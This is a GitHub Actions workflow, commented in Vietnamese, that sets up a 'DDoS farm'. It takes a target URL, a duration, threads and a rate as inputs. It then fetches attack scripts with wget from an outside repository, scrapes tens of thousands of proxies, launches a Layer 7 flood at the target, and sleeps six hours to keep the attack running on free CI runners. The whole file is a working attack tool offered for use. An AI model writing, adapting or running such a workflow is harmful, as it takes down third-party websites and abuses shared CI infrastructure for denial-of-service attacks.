name: DDoS Farm Layer7 + Auto Fresh Proxy

on:
  workflow_dispatch:
    inputs:
      method:
        description: 'Method (1-4)'
        required: true
        default: '2'
        type: choice
        options: ['1','2','3','4']
      target:
        description: 'Target URL'
        required: true
      time:
        description: 'Time (giây)'
        required: true
        default: '1800'
      threads:
        description: 'Threads'
        required: true
        default: '128'
      rate:
        description: 'Rate'
        required: true
        default: '256'

jobs:
  attack:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - uses: actions/setup-python@v5
        with:
          python-version: '3.11'

      - name: Download tools (link raw đúng 100%)
        run: |
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/refs/heads/main/cf.js
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/refs/heads/main/run.py
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/refs/heads/main/proxy.js
          chmod +x *

      - name: Lấy proxy tươi (30k+ mỗi lần)
        run: |
          echo "Đang cào proxy từ 50+ nguồn mạnh nhất 2025..."
          node proxy.js
          echo "Đã lấy $(wc -l < proxy.txt) proxy sống!"

      - name: Bắn Layer7
        run: |
          nohup python3 run.py << EOF
          2
          1
          ${{ inputs.method }}
          ${{ inputs.target }}
          ${{ inputs.time }}
          ${{ inputs.threads }}
          ${{ inputs.rate }}
          proxy.txt
          EOF

      - name: Keep alive 6 tiếng
        run: sleep 21600
